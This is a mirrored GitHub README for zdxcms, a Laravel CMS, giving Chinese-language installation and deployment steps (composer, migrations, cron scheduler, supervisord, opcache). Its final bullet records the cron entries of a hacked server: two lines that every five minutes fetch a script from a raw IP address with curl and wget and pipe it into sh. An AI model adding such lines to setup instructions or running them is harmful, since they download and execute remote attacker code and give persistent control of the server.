GithubHelp home page GithubHelp logo

zdxcms's Introduction

zdxcms

安装步骤:

  • git clone https://github.com/wenhaiqing/zdxcms.git

  • cp .env.example .env 手动创建数据库 修改配置文件的数据库配置

  • composer install

  • php artisan key:generate

  • php artisan migrate --seed

  • 给项目文件夹0755权限

  • 创建任务调度器export EDITOR=vi && crontab -e

  • corn会在每分钟调度一次laravel命令调度器* * * * * php /home/vagrant/Code/xxx/artisan schedule:run >> /dev/null 2>&1

  • supervisord -c /etc/supervisord.conf或者supervisorctl reload重启进程管理

  • 开启了opcache 每次修改代码都得reload

  • 定时任务被黑的郭高伟 */5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh */5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh

zdxcms's People

Contributors

ggw521 avatar wenhaiqing avatar

Watchers

 avatar  avatar

Forkers

csliangdu

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.